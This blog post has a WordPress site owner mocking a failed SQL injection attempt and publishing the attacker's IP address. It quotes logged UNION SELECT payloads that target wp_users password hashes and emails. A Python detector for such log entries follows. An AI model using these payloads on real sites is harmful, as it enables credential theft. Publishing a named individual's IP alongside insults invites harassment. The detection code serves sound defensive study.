Yes, one stupid son of a bitch tried to hack us…
But, of course, his mission was a failure :D
For the curious ones, here is the hacker's IP: 91.211.65.25
He is from UK…
And he was trying some sort of SQL Injection…
In the search box he typed

1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

So, if anyone knows this particular person, please inform him/her that

Just because this site's name is Stupid Site, it does not mean that I, owner and admin of this site, am stupid…

Keep trying, you won't get anywhere :D

UPDATE:

Wow, looks like this guy was here more than once…

I just checked all my logs searching for his IP, and this is what I found:

“20090123″,”13:52:22″,”91.211.65.25″,”cat=999%20UNION%20SELECT%20null,CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37)),null,null,null%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090123″,”13:52:24″,”91.211.65.25″,”cat=%2527%20UNION%20SELECT%20CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37))%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:36:53″,”91.211.65.25″,”cat=999%20UNION%20SELECT%20null,CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37)),null,null,null%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:36:55″,”91.211.65.25″,”cat=%2527%20UNION%20SELECT%20CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37))%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:36:56″,”91.211.65.25″,”page_id=115&forumaction=showprofile&user=1+union+select+null,concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_email,char(37),char(95),char(37),char(95),char(37)),null,null,null,null,null+from+wp_tbv_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:37:05″,”91.211.65.25″,”page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37))/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201″,”",”",”",”",”",”",”",”",”"

“20090127″,”19:38:35″,”91.211.65.25″,”exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23″,”",”",”",”",

In the first “” you can find the date, and as you can see, he was here on January 23, 24 and 27. In the second “” you can see the time, and as you probably noticed by now, the time between requests is 1-2 seconds… So, I am guessing that he or she is using some kind of program. LAMER!

Anyway, I think that this is a very good way to fight “hackers”. If you just ban them, they will come back with a proxy, but if you put their IP on the front page, they will know they FAILED!

P.S. If anyone knows any UK gov site where I can report this, please post it in the comments. (I am tired of googling…)
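The manual log review in the update above can be automated. The following is an added example, not code from the original post: it parses the same four leading columns (date, time, IP, query string), undoes the URL encoding and `/**/` comment padding seen in the logged requests, flags UNION-based reads, and counts flagged requests arriving within 2 seconds of the previous one from the same IP. The sample lines, the documentation IP addresses, the straight-quoted CSV layout and the function names are assumptions made for the example.

```python
import csv, io, re
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed sample in the post's column order; shortened queries, and
# 192.0.2.x / 198.51.100.x are documentation addresses, not real log data.
SAMPLE_LOG = '''"20090123","13:52:22","192.0.2.10","cat=999%20UNION%20SELECT%20null,CONCAT(user_pass,user_login)%20FROM%20wp_users/*"
"20090123","13:52:24","192.0.2.10","cat=%2527%20UNION%20SELECT%20CONCAT(user_pass,user_login)%20FROM%20wp_users/*"
"20090124","11:37:05","192.0.2.10","page_id=13&photo=-3%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/user_pass/**/from%2F%2A%2A%2Fwp_users"
"20090124","11:40:00","198.51.100.7","s=european+union+select+committee"
"20090124","11:41:00","198.51.100.7","cat=5"
'''

def normalize(query, rounds=3):
    """Decode repeatedly (catches %2527-style double encoding), then
    replace inline SQL comments with spaces and lowercase the result."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query)  # /**/ used in place of spaces
    return re.sub(r"\s+", " ", query).lower()

# UNION SELECT followed by FROM: a plain search for "union select" without
# a FROM clause (see the fourth sample line) is not flagged.
UNION_READ = re.compile(r"\bunion (?:all )?select\b.*\bfrom\b")

def analyze(log_text, burst_seconds=2):
    """Return {ip: {"hits": n, "bursts": m}} for requests matching UNION_READ.
    A burst is a flagged request within burst_seconds of the previous
    flagged request from the same IP, a hint that a tool is in use."""
    report, last_seen = {}, {}
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) < 4:
            continue
        date, time, ip, query = row[:4]
        if not UNION_READ.search(normalize(query)):
            continue
        ts = datetime.strptime(date + time, "%Y%m%d%H:%M:%S")
        entry = report.setdefault(ip, {"hits": 0, "bursts": 0})
        entry["hits"] += 1
        if ip in last_seen and (ts - last_seen[ip]).total_seconds() <= burst_seconds:
            entry["bursts"] += 1
        last_seen[ip] = ts
    return report

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```
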
